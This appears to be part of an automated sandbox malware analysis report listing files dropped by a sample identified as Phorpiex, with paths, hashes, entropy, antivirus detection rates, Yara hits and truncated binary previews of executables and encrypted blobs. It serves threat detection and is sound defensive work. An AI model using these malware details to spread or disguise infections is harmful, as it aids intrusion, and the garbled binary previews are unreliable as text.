                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\1[1]

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):110600
                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\thcdVit1dX.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9728
                                                                                                                                                    Entropy (8bit):5.254547230411213
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:zMn7AN23D0TXraYgnY1dTNDiIp+BYA8vrcVO15uJxGE9YUBz2qh3C7tCEkC:A7ANUYhUYPtp+OFMJxTmUBzthckC
                                                                                                                                                    MD5:8D8E6C7952A9DC7C0C73911C4DBC5518
                                                                                                                                                    SHA1:9098DA03B33B2C822065B49D5220359C275D5E94
                                                                                                                                                    SHA-256:FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
                                                                                                                                                    SHA-512:91A573843C28DD32A9F31A60BA977F9A3D4BB19FFD1B7254333E09BCECEF348C1B3220A348EBB2CB08EDB57D56CB7737F026519DA52199C9DC62C10AEA236645
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: bomb.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L.....Df..................................... ....@..........................`......?.....@.................................l$.......@.......................P.......................................#..@............ ...............................text...z........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):5.379401388151058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:fLHxvIIwLgZ2KRHWLOugEs
                                                                                                                                                    MD5:E1EE0479D96955B1FB2CC31056370383
                                                                                                                                                    SHA1:34786077993793FCB28FA325740270F5F7F8723E
                                                                                                                                                    SHA-256:20C37B9D9110033848F4AB81E3A860C2B56E1DBBFFB2F361B2FBE9D47F91F967
                                                                                                                                                    SHA-512:91C99CA6000309B28FB7776512B6418F11EDDEC960DDC11FB05B758CD589D1BF1EE1E09C8C5648062F8D750FA211BF115CADF873FAFB810296AC480E60790C54
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1863518468.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):110600
                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2355412914.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8704
                                                                                                                                                    Entropy (8bit):5.0125514402992275
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
                                                                                                                                                    MD5:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                    SHA1:416FC65D538D3622F5CA71C667A11DF88A927C31
                                                                                                                                                    SHA-256:5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
                                                                                                                                                    SHA-512:BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: bBcZoComLl.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: GGXhCiYFBw.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 0NSjUT34gS.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: bomb.exe, Detection: malicious, Browse
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(....*....4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&..*..........66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2658326577.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85504
                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\2658326577.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4BBF.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\thcdVit1dX.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9728
                                                                                                                                                    Entropy (8bit):5.254547230411213
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:zMn7AN23D0TXraYgnY1dTNDiIp+BYA8vrcVO15uJxGE9YUBz2qh3C7tCEkC:A7ANUYhUYPtp+OFMJxTmUBzthckC
                                                                                                                                                    MD5:8D8E6C7952A9DC7C0C73911C4DBC5518
                                                                                                                                                    SHA1:9098DA03B33B2C822065B49D5220359C275D5E94
                                                                                                                                                    SHA-256:FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
                                                                                                                                                    SHA-512:91A573843C28DD32A9F31A60BA977F9A3D4BB19FFD1B7254333E09BCECEF348C1B3220A348EBB2CB08EDB57D56CB7737F026519DA52199C9DC62C10AEA236645
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L.....Df..................................... ....@..........................`......?.....@.................................l$.......@.......................P.......................................#..@............ ...............................text...z........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\651713841.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):110600
                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\71384504.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\4BBF.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85504
                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\71384504.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Setup_20241026012616_Failed.log

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\thcdVit1dX.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):753
                                                                                                                                                    Entropy (8bit):5.009841577102086
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:ClrU8tVBOULLWUzJhRcSsxgXzdC5SsR8o5Ss/bxG5Ss/lxG5Ss/qxG5SsJ:CBLMwLLzJhRcSscdC5SsR8o5Ss/M5SsY
                                                                                                                                                    MD5:F861661AEB4FF1263AC9E286C8A546E4
                                                                                                                                                    SHA1:F7532C8C9EF99E840773E582465EEF0FE88E1518
                                                                                                                                                    SHA-256:540A6B2FAEA8FEA201CCC2A75F010475D40C5D8275D40A754685A9D5BDAD2C9D
                                                                                                                                                    SHA-512:08AA40497BD36EA886EC7C836C4DDE32CF825BE306A8A725EF553F8073C79A88A9CA5D120849B5A846D463CB67156007FE67FA85D74C0AB456C0B318612B3700
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:[1C58:1C5C][2024-10-26T01:26:16]i001: Burn x86 v5.0.0+41e11442b2ca93e444b60213b5ae99dcbab787d8, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Users\user\Desktop\thcdVit1dX.exe..[1C58:1CC0][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to extract all files from container, erf: 1:2:0..[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to wait for operation complete...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to open container...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to open attached container...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to open attached UX container...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to initialize core...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e31keeoj.oxc.ps1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpftffop.a0c.ps1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prmmsvqy.5zp.psm1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suqhbnrw.yp1.psm1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                    C:\Users\user\tbtcmds.dat

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):286
                                                                                                                                                    Entropy (8bit):7.369827619940847
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:JI+cPhYsQuLyuCFmYRhegKv12u5JRn2BtmlFnI0QBIzxN0wi4HvvL:GvhouGFredJcBsjDqIdN0wiQvT
                                                                                                                                                    MD5:3DEA10446B12B8B16638C64ADEE9CF7D
                                                                                                                                                    SHA1:79E5EBA41FFD6D6D0C633E9851FF2BC8B6FCAEA7
                                                                                                                                                    SHA-256:E178E70155316BFFABAD28DB3DAF9F60A878243C5F3B8A59E37ADC7664F1A669
                                                                                                                                                    SHA-512:5247BEFA86704AEEB1ED782F025BD9B474E14F6A83E0E2B6DD4DC8800C23788FE2CA770AEBF8F4C0C0B5BE81311A0ABF9385F182FB7D0379094FCDD565B7C56D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:y..6+....S.i...:g..(.J-j*..x(..K*ec..p....$...:'......u....Y.....pt."..?....2.A.xa.|.Jor....W....Itk..S.R.>.DWE5..c...".3.FC.!o7\......Sl.k........'..l..F.M.......B..b..-..r.....[R..F. z".K..F.8x........l; ....]....Z.. !D.X.L.Y.t..#..k..y.R^o..ve.mOnsU...~o..J..mhd..

                                                                                                                                                    C:\Users\user\tbtnds.dat

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4096
                                                                                                                                                    Entropy (8bit):4.856654624928782
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:F4OlognIZioHgWZbb7N8vNhsC2NQ7s+UJs20v7ing7/6bTwb:OOloDZiKLZbb7NkNhsl+UlGUc6bTC
                                                                                                                                                    MD5:98F07FE9691B1DF12FB691071E160D20
                                                                                                                                                    SHA1:73EBBADEA38617987E5B09BCF7411C1E2B33C967
                                                                                                                                                    SHA-256:4E3C5BC31D8420314A87FCFEBABE4CFAC9A3B9C898D3FC67BA6E6928686130E1
                                                                                                                                                    SHA-512:AD6CF43814F49F63569FA6354B50632A1BFFBBDED5479C82F0DF6BD204D7154E7C0026B5504A4C93AF23F0D2C008F8449D55825BD46FD002DA1FCAA9B448DDF1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:Y!.. .MT..BC..MT.2....MT......MT.....MT.A....MT.d....MTY#.p..MT......MT..@&..MT.....MT..h...MT.....MT.."...MT......MT..>..MT.....MT...Z.....G.(......[o...._:.....N.G.....Z......%.}B.......o....M_./.............c.g............U.s.....mJE+....^.D....._8L....._;.f...................[.>..................M.........-X.............E.....Z..............%.............Z...............W..V.....K!*....m.o...._9......Q_._......'(......Pi....V>.........R....^.........l\......0.....%..V....].V......?.......................C.....Z.......Z..B....)e.a.....R.......c......N'.y............Z..7......4.....u.....^..K....U.m.......%......2.......m.....^..........<..................].S.....\.V......x.u....Z..>....\...............................M%....%.q.....%..6......~'.....D.....Z..j....Z..{.....XQ......X......U.h......K_r......<e.....#H......]5.......cw....\/.....m.7.....Z..........?....-.|q....[.\.....Z..H..............;.............6........I.............N'.........a.......I....

                                                                                                                                                    C:\Windows\sysppvrdnvs.exe

                                                                                                                                                    Download File
